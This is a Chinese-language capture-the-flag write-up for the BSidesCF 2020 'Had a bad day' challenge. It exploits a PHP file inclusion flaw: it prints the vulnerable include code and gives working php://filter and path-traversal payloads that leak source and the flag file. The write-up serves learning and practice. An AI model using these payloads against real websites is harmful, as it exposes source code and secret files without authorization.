[BSidesCF 2020]Had a bad day
参考:文件包含漏洞
Step
点一下按钮,发现URL发生改变:
url/index.php?category=woofers
修改尝试发现回显:
Sorry, we currently only support woofers and meowers.
继续尝试修改:
url/index.php?category=woofers.php;flag
回显:
Warning: include(woofers.php;flag.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37
Warning: include(): Failed opening 'woofers.php;flag.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37
意识到是文件包含
构造:
url/index.php?category=php://filter/convert.base64-encode/resource=index
将得到的源码解密,其中的php代码:
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
strpos(s1,s2)用来查找s2字符串在s1字符串中的位置,只要包含s2就行,所以只要category中包含woofers,meowers或者index就可以
所以构造:
url/index.php?category=php://filter/convert.base64-encode/resource=index/../flag
因为flag被注释了所以没有显示,利用伪协议嵌套也可以得到flag:
url/index.php?category=php://filter/convert.base64-encode/index/resource=flag
或
url/index.php?category=php://filter/read=index/convert.base64-encode/resource=flag
标签:category,index,url,Had,flag,woofers,bad,2020,php
From: https://www.cnblogs.com/bolerat/p/18336265